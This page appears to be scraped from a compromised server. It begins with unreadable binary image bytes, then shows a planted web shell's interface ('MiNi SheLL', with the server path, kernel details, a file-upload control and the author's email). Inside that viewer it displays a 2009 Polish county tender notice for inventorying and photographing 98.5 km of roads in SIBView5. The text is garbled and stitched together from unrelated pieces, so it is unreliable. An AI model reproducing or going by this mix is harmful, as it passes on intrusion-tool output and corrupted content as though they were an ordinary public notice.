JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090515/151402-N-2009.html

<p class="kh_header"><b>Pruszcz Gdański: Sporządzenie ewidencji dróg powiatowych na terenie Powiatu Gdańskiego - etap końcowy (bezpośrednia inwentaryzacja i dokumentacja fotograficzna 98,5 km dróg, wprowadzenie  i zintegrowanie danych w posiadanym systemie SIBView5).</b><br>
<b>Numer ogłoszenia: 151402 - 2009; data zamieszczenia: 15.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Gdański z siedzibą w Pruszczu Gdańskim reprezentowany przez Zarząd Powiatu Gdańskiego , ul. Wojska Polskiego 16, 83-000 Pruszcz Gdański, woj. pomorskie, tel. 058 6834999, faks 058 6834899.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-gdanski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzenie ewidencji dróg powiatowych na terenie Powiatu Gdańskiego - etap końcowy (bezpośrednia inwentaryzacja i dokumentacja fotograficzna 98,5 km dróg, wprowadzenie  i zintegrowanie danych w posiadanym systemie SIBView5)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sporządzenie ewidencji dróg powiatowych na terenie Powiatu Gdańskiego  -  etap  końcowy (bezpośrednia  inwentaryzacja i  dokumentacja  fotograficzna 98,5 km dróg, wprowadzenie i zintegrowanie danych w posiadanym systemie SIBView5).
Wykonana ewidencja dróg musi być zgodna z aktualnie obowiązującymi przepisami prawnymi,
a w szczególności:
- Rozporządzenie Ministra Infrastruktury z dnia 16 lutego 2005 r. w sprawie sposobu numeracji  i ewidencji dróg publicznych, obiektów mostowych, tuneli, przepustów i promów oraz rejestru numerów nadanych drogom, obiektom mostowym i tunelom (Dz. U. Nr 67, poz. 582);
- Rozporządzenie Ministra Infrastruktury z dnia 16 lutego 2005 r. w sprawie trybu sporządzania informacji oraz gromadzenia i udostępniania danych o sieci dróg publicznych, obiektach mostowych, tunelach oraz promach (Dz. U. 67, poz. 583).
- Ustawa z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2006 r. Nr 156, poz. 1118,  z późn. zm.);
-Ustawa z dnia 21 marca 1985 r. o drogach publicznych (Dz. U. z 2007 r. Nr 19,   poz. 115, z późn. zm.);
-Ustawa z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (Dz. U. z 2005 r. Nr 108, poz. 908, z późn. zm.);
-Rozporządzenie Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz. U. Nr 43, poz. 430);
a)Współrzędne należy wyznaczać w punktach na osi drogi.
b)Oś drogi wyznaczać będzie linia pomiaru, która przebiegać ma:
- na drogach jednojezdniowych, po środku jezdni, pomiędzy jej krawędziami; w przypadku istnienia namalowanej środkowej linii dzielącej, linia ta jest  uznawana za linię pomiarową,
- na drogach dwujezdniowych na lewej krawędzi skrajnego lewego pasa ruchu prawej jezdni, zgodnie z kierunkiem drogi,
- na łącznicach tak jak na drogach jednojezdniowych,
- na skrzyżowaniach w formie ronda - w osi jezdni głównej.
c)Punkty na osi drogi mają być mierzone ze średnią częstotliwością nie mniejszą niż jeden punkt co 8 metrów. 
d)Współrzędne należy ustalić w państwowym układzie współrzędnych 1992 z dokładnością pomiaru poniżej 1 m. 
e)Na podstawie danych geometrycznych osi drogi uzyskanych w wyniku pomiaru należy określić następujące parametry geometryczne trasy drogi:
łuki poziome:
- promień łuku z dokładnością do 10 m,
 - charakterystyka łuku (skręcający w prawo;w lewo),
- długość łuku z dokładnością:
- do 10m dla promienia 100 < R mniejszy badź równy  300 
- do 20m dla promienia 300 < R mniejszy badź równy  1000 
- do 50m dla promienia 1000 < R mniejszy badź równy 2000 
- do 100m  dla promienia  R > 2000 w obrębie danego odcinka referencyjnego,
- całkowita długość łuku z dokładnością do 10 m w przypadku łuków wykraczających poza obręb jednego odcinka międzywęzłowego,
- usytuowanie łuku poprzez podanie kilometraża lokalnego w odniesieniu do danego odcinka międzywęzłowego,
- usytuowanie łuku w odniesieniu do całej drogi poprzez podanie numeru odcinka międzywęzłowego oraz kilometraża lokalnego początku łuku i numeru odcinka międzywęzłowego oraz kilometraża lokalnego końca łuku w przypadku łuków wykraczających poza obręb jednego odcinka międzywęzłowego; format przekazania danych: plik.xls
odcinki proste:
-  długość odcinka prostego w obrębie danego odcinka międzywęzłowego,
- całkowita długość odcinka prostego pomiędzy dwoma łukami poziomymi w przypadku odcinków prostych wykraczających poza obręb jednego odcinka międzywęzłowego,
- usytuowanie odcinka prostego poprzez podanie kilometraża lokalnego w odniesieniu do danego odcinka międzywęzłowego,
- usytuowanie odcinka prostego w odniesieniu do całej drogi poprzez podanie numeru odcinka międzywęzłowego oraz kilometraża lokalnego początku prostej i numeru odcinka międzywęzłowego oraz kilometraża lokalnego końca prostej w przypadku odcinków prostych wykraczających poza obręb jednego odcinka międzywęzłowego; format przekazania danych: plik.xls
Dane o łukach poziomych i odcinkach prostych muszą być zamieszczone w oferowanym Zamawiającemu oprogramowaniu wspomagającym (edytorem drogowych danych ewidencyjnych) zarządzanie drogami.
ad.3.2.  Inwentaryzacja dróg powiatowych wraz z zakodowaniem i zintegrowaniem danych w posiadanym  systemie SIBView5. 
Inwentaryzacja w korytarzu drogi należy wykonać w oparciu o dane ewidencyjne  Książki Drogi w następującym zakresie:
a) kolumny z zakresu 2-4, 6-30, 32-34 , 36 i 38-40  tabeli 8 książki drogi
b)kolumny z zakresu 2-4 , 8-13 tabeli 9 książki drogi
c)kolumny z zakresu 2-4, 6-17 tabeli 10 książki drogi 
Wyniki pomiarów i obliczeń należy przekazać w formie bazy danych zgodnej z posiadanym przez Zamawiającego oprogramowaniu, umożliwiającym również ich edycję zarówno w formie książki drogi jak i planu liniowego.
Inwentaryzacji podlega zebranie  następujących informacji:
a)inwentaryzacja parametrów technicznych drogi:
- parametry elementów korytarza drogi 	
(lokalizacja, szerokość, długość, powierzchnia i rodzaj nawierzchni)
- informacje o skrzyżowaniach 	
(lokalizacja, rodzaj, długość, zabezpieczenie;droga)
- informacje o obiektach mostowych	
(lokalizacja, rodzaj obiektu)
- informacje o skrajniach	
(lokalizacja, rodzaj obiektu, szerokość, wysokość)
b)inwentaryzacja zagospodarowania dróg:
- informacje o zjazdach 	
(lokalizacja, rodzaj, nawierzchnia, szerokość)
- informacje o obiektach przydrożnych	
(lokalizacja, rodzaj obiektu)
c)inwentaryzacja wyposażenia dróg:
- informacje o oznakowaniu poziomym	
- informacje o oznakowaniu pionowym
- informacje o barierach i ekranach
- informacje o oświetleniu
- informacje o sygnalizacji
ad.3.3. Dokumentacja fotograficzna korytarza drogi wraz z zakodowaniem i zintegrowaniem danych w posiadanym systemie SIBView5. 
a)dokumentację fotograficzną należy wykonać w dowiązaniu do systemu referencyjnego, w formie cyfrowych zdjęć sekwencyjnych z interwałem wynoszącym 5m
b)zdjęcia należy wykonać przynajmniej z czterech kamer jednocześnie:
- widok do przodu 
- widok do przodu ; prawa strona drogi
- widok do przodu ; lewa strona drogi
- widok do tyłu 
c)zdjęcia należy wykonać przy zachowaniu następującego warunków:
- zgodnie z kierunkiem przebiegu drogi (rosnącej kilometracji)
- pozycje kamer względem drogi (wysokość, kąt nachylenia) i ich parametry muszą być stałe dla wszystkich wykonanych zdjęć
d)minimalna rozdzielczość zdjęć dla widoku do przodu to 1388x1038, dla pozostałych 1280x960
e)wraz z rejestracją zdjęciową niezbędne jest pozyskanie informacji o współrzędnych geograficznych (GPS) wraz z dokładnym pozycjonowaniem kierunku jazdy pojazdu pomiarowego
f)w czasie realizacji zdjęć należy wykonać odpowiednie pomiary, celem wyskalowania obrazu dla funkcji do pomiaru szerokości i wysokości elementów
g)wykonane zdjęcia należy przekazać na nośnikach typu DVD i na dyskach HDD w formacie zgodnym z posiadanym przez Zamawiającego oprogramowaniem, które powinno umożliwiać bezpośrednie wykorzystanie zdjęć do wykonywania pomiarów szerokości i wysokości elementów widocznych na zdjęciach
h)nośniki ze zdjęciami muszą również zawierać oprogramowanie narzędziowe, uruchamiane automatycznie po włożeniu nośnika do napędu (bez wcześniejszej instalacji), umożliwiające ich przeglądanie oraz wykonywanie pomiarów elementów widocznych na zdjęciach; wymagana jest możliwość przeglądania zdjęć w dwóch trybach:
- standardowe przeglądanie: automatyczne wyszukanie i prezentacja zdjęć dla wskazanego przez użytkownika pikietaża i wybranych kamer
- odtwarzanie ciągłe: automatyczna zmiana wyświetlanych zdjęć dla wybranego odcinka drogi, zgodnie z kierunkiem tej drogi; użytkownik w takim trybie pracy wybiera odcinek, kamery i pikietaż, od którego następuje odtwarzanie ciągłe
i)wraz z dokumentacją fotograficzną należy dostarczyć odpowiednie oprogramowanie narzędziowe, które umożliwi przeglądanie zdjęć w oparciu o system referencyjny i kilometraż; wymagana jest jednoczesna prezentacja dla użytkownika następujących informacji dotyczących miejsca wykonania przeglądanych aktualnie zdjęć (bez względu na tryb przeglądania):
- pikietaż lokalny (długość od początku odcinka)
- pikietaż drogi (długość w ramach własności zarządcy)
- kilometraż globalny
- pomiar powierzchniowy elementów widocznych na zdjęciach
- pomiar polilinii 
- możliwość włączenia na każdym widoku z kamer siatki pomiarowej
- możliwość odczytywania ze zdjęć informacji o globalnych współrzędnych obiektów punktowych, liniowych i powierzchniowych
j)wszystkie nośniki (DVD) należy dostarczyć z etykietami zawierającymi informacje o ich zawartości ad.3.4.  Aktualizacja Mapy Techniczno - Eksploatacyjnej dla całej sieci dróg powiatowych (wraz z nowo zinwentaryzowanymi) z zakodowaniem i zintegrowaniem danych w posiadanym  systemie SIBView5. 
Mapę techniczno - eksploatacyjną (TE) należy wykonać w oparciu o dane inwentaryzacyjne zebrane bezpośrednio w terenie. 
Mapę należy dostarczyć w dwóch formatach elektronicznych:
a)format AutoCAD
b)format MapInfo
Ponadto mapę należy dostarczyć w formie papierowej w skali 1:25 000
4. Wymogi realizacji zamówienia:
a) Zamawiający informuje, że prowadzi ewidencję dróg powiatowych w programie SIBView5, w związku z powyższym oprogramowanie to jest niezbędne do wykonania przedmiotu zamówienia.
Uwaga: podana nazwa programu nie narusza przepisów ustawy Prawo zamówień publicznych, gdyż  jego wskazanie uzasadnione jest posiadaniem przez Zamawiającego wdrożonego w 2008 r. programu SIBView5. Mając na uwadze powyższe zachodzi konieczność zachowania norm, parametrów i standardów jakimi charakteryzuje się przedmiotowy program. 
c)Zamawiający dopuszcza jednak zastosowanie równoważnego oprogramowania.
Za równorzędne oprogramowanie uznaje się taki program, który umożliwia wprowadzanie 
danych do zmian w systemie SIBView5. Zamawiający uzna warunek za spełniony, jeśli równoważne oprogramowanie uzyska certyfikat zgodności z systemem SIBView5, wystawiony przez autora systemu. Wymóg konieczności certyfikowania oprogramowania równoważnego wynika z zapisów gwarancji działania bazy danych wystawionej przez licencjodawcę.
5. Zamawiający informuje, że prowadzona w programie SIBView5 ewidencja dróg powiatowych zawiera:
- Projekt systemu referencyjnego wraz z mapą interaktywną dla wszystkich dróg Powiatu Gdańskiego (skala projektu 1:50.000, skala mapy interaktywnej 1:10.000) 
- Mapy dla obszaru powiatu gdańskiego oraz dla obszaru miasta Pruszcz Gdański oraz atlas sieci drogowej
- Stabilizację punktów referencyjnych z udokumentowaniem stref skrzyżowań należących do    
 Zamawiającego w oparciu o lokalny układ współrzędnych - dla całej sieci dróg.
 - Pomiar długości i geometrii osi, bezpośrednią inwentaryzacje oraz dokumentację  fotograficzną dla 188,5 km sieci dróg powiatowych.
 - Mapę techniczno - eksploatacyjną (dla całej sieci dróg powiatowych, ale z danymi dotyczącymi dróg zinwentaryzowanych)
- Oprogramowanie wspomagające zarządzanie siecią drogową wraz z możliwością edycji danych - program z możliwością przeglądania i edycji danych drogowych z możliwością generowania planu liniowego i Książki Drogi
- Oprogramowanie wspomagające zarządzanie obiektami mostowymi wraz z możliwością edycji danych
- Oprogramowanie w zakresie zbierania informacji o wypadkach i kolizjach drogowych.
- Oprogramowanie w zakresie obsługi zajęcia pasa drogowego
Przedmiot  zamówienia ma być spójny z w.w elementami wykonanej wcześniej ewidencji..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5, 71.32.21.00-2, 72.22.21.00-8, 72.31.40.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest do wniesienia wadium w wysokości 1.500,- zł (jeden tysiąc pięćset  złotych) najpóźniej w dniu składania ofert do godz. 11:30<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Nie podleganie wykluczeniu z postępowania o udzielenie niniejszego zamówienia na podstawie art. 24 ust. 1 i 2 Ustawy.
2. Spełnienie warunków określonych w art. 22 ust. 1 pkt 1-3 Ustawy tj.:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj.:
-  prowadzą działalność gospodarczą w zakresie sporządzania ewidencji dróg
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem         
 technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią   
 pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonywania zamówienia tj. 
- wykażą się   wykonaniem w okresie ostatnich 3 lat usług z zakresu odpowiadającego przedmiotowi zamówienia, a jeżeli okres prowadzenia  działalności jest krótszy - w  tym okresie, (z podaniem ich wartości oraz  daty i miejsca wykonania) minimum 3 sporządzonymi ewidencjami dróg o wartości nie mniejszej niż 30.000 zł każda, załączą dokumenty  potwierdzające należyte wykonanie tych usług oraz dołączą na nośniku elektronicznym CD prezentację jednej z wykonanych usług. Wykazane ewidencje muszą być wykonane w SIBView5. Dołączona prezentacja musi być wykonana w standardzie zgodnym z SIBView5 lub możliwa do uruchomienia w SIBView5 bez utraty funkcjonalności oraz informacji. 
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
Spełnianie warunków udziału w postępowaniu oceniane będzie na podstawie załączonych do oferty oświadczeń i dokumentów, o których mowa w pkt VIII.1 i w pkt VIII.6 i 7 siwz oraz oryginałów lub kopii poświadczonych za zgodność z oryginałem przez Wykonawcę dokumentów określonych w pkt VIII.2-5 i w pkt VIII.8 -9  siwz. Zamawiający dokona oceny każdego z warunków na podstawie załączonych do oferty wymaganych dokumentów zgodnie z kryterium spełnia/ nie spełnia. 
Spełnienie warunków przez podmioty występujące wspólnie (np. tzw. konsorcja):
W celu potwierdzenia spełnienia warunków udziału w postępowaniu każdy z podmiotów występujących wspólnie winien załączyć do oferty oświadczenie, o którym mowa w pkt VIII.1 siwz oraz dokumenty, o których mowa w pkt VIII.2-5 siwz. W zakresie pozostałych dokumentów Wykonawcy występujący wspólnie winni wykazać się, iż łącznie spełniają te warunki poprzez złożenie dokumentów określonych w pkt VIII.6-9 siwz..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Oświadczenie Wykonawcy o nie podleganiu wykluczeniu z postępowania w oparciu o art. 24 ust. 1 i 2 Ustawy (wzór zał. nr 2 do siwz).
2.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu do składania ofert.
4.Aktualna informacja z Krajowego Rejestru Karnego wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - w zakresie określonym w art. 24 ust. 1 pkt 4-8 Ustawy.
5.Aktualna informacja z Krajowego Rejestru Karnego wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - w zakresie określonym w art. 24 ust. 1 pkt 9 Ustawy.
6.Dowód wniesienia wadium.
7.Wykaz wykonanych minimum 3 usług polegających na sporządzeniu ewidencji dróg, o wartości nie mniejszej niż 30.000 zł każda, wykonanych w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w  tym okresie (wzór zał. Nr 3 do siwz), (z podaniem ich wartości oraz daty i miejsca wykonania wraz z dokumentami potwierdzającymi, że usługi te zostały wykonane należycie) oraz nośnik elektroniczny CD z prezentacją jednej z wykonanych usług. Wykazane ewidencje muszą być wykonane w SIBView5. Dołączona prezentacja musi być wykonana w standardzie zgodnym z SIBView5 lub możliwa do uruchomienia w SIBView5 bez utraty funkcjonalności oraz informacji.
8.W przypadku zastosowania programowania równoważnego - certyfikat zgodności tego oprogramowania  z oprogramowaniem SIBView5.
9.Umowa konsorcjum dostarczona po wyborze najkorzystniejszej oferty (o ile dotyczy)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiat-gdanski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Pruszczu Gdańskim, ul. Wojska Polskiego 16, pok. nr 122. Specyfikacja nieodpłatna  - ewentualne koszty przesyłki 11,90 zł..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.05.2009 godzina 11:30, miejsce: Starostwo Powiatowe w Pruszczu Gdańskim, ul. Wojska Polskiego 16, 83 - 000 Pruszcz Gdański, Sekretariat pok. nr 101.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com